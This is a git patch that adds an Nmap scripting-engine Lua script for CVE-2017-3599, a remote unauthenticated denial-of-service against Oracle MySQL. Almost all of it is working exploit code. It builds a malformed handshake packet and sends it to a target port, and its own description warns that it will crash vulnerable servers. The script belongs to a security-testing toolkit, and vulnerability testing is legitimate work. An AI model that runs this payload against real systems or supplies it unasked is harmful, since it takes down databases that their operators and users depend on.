From e19b2ab80b06ea6884fee5e2aaec896da45b371c Mon Sep 17 00:00:00 2001 From: Loganaden Velvindron Date: Mon, 8 May 2017 18:21:36 +0400 Subject: [PATCH] Add mysql-vuln-cve2017-3599.nse. --- scripts/mysql-vuln-cve2017-3599.nse | 70 +++++++++++++++++++++++++++++ 1 file changed, 70 insertions(+) create mode 100644 scripts/mysql-vuln-cve2017-3599.nse diff --git a/scripts/mysql-vuln-cve2017-3599.nse b/scripts/mysql-vuln-cve2017-3599.nse new file mode 100644 index 000000000..68f4deb17 --- /dev/null +++ b/scripts/mysql-vuln-cve2017-3599.nse @@ -0,0 +1,70 @@ +description=[[ +CVE-2017-3599 - remote unauthenticated Denial of Service against Oracle MySQL. +Warning: This WILL cause DoS on vulnerable mysql machines. +Thanks: SECWORKS, hackers.mu team. +]] + +--- +--@usage nmap -sU -p --script mysql-vuln-cve2017-3599 --script-args mysql-vuln-cve2017-3599.ports= +--@output +--PORT STATE SERVICE +--3306/tcp open mysql +--|_mysql-vuln-cve2017-3599: true + +author = "Loganaden Velvindron (logan@hackers.mu)" +license = "Same as Nmap--See http://nmap.org/book/man-legal.html"; +categories = {"dos", "vuln", "exploit", "intrusive"} + +local string = require "string" +local shortport = require "shortport" +local bin = require "bin" +local comm = require "comm" +local stdnse = require "stdnse" + +portrule = function(host, port) + if not stdnse.get_script_args(SCRIPT_NAME .. ".ports") then + stdnse.print_debug(3,"Skipping '%s' %s, 'ports' argument is missing.",SCRIPT_NAME, SCRIPT_TYPE) + return false + end + +local ports = stdnse.get_script_args(SCRIPT_NAME .. ".ports") + +--print out a debug message if port 3306/tcp is open + if port.number==3306 and port.protocol == "tcp" and not(ports) then + stdnse.print_debug("Port 3306/tcp is open. mysql over tcp") + return false + end + + return port.protocol == "tcp" and stdnse.in_port_range(port, ports:gsub(",",",") ) and + not(shortport.port_is_excluded(port.number,port.protocol)) +end + + +local packet1 = +string.char(0x01) +..string.char(0x85, 0xa2, 0xbf, 0x01) +..string.char(0x00, 0x00, 0x00, 0x01) +..string.char(0x21) +--..string.char(0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00) +..string.rep(string.char(0x00),23) +.."test" +..string.char(0x00) +..string.char(0xff) + +local packet1_len = bin.pack("i", string.len(packet1)-1) +packet1_len = string.sub(packet1_len,1,3) + +local payload = packet1_len..packet1 + + +action = function(host, port) +local status, result = comm.exchange(host, port, payload, {proto="tcp", recv_before=true, timeout=8000}) + + +if not status then + return false +else + return true +end + +end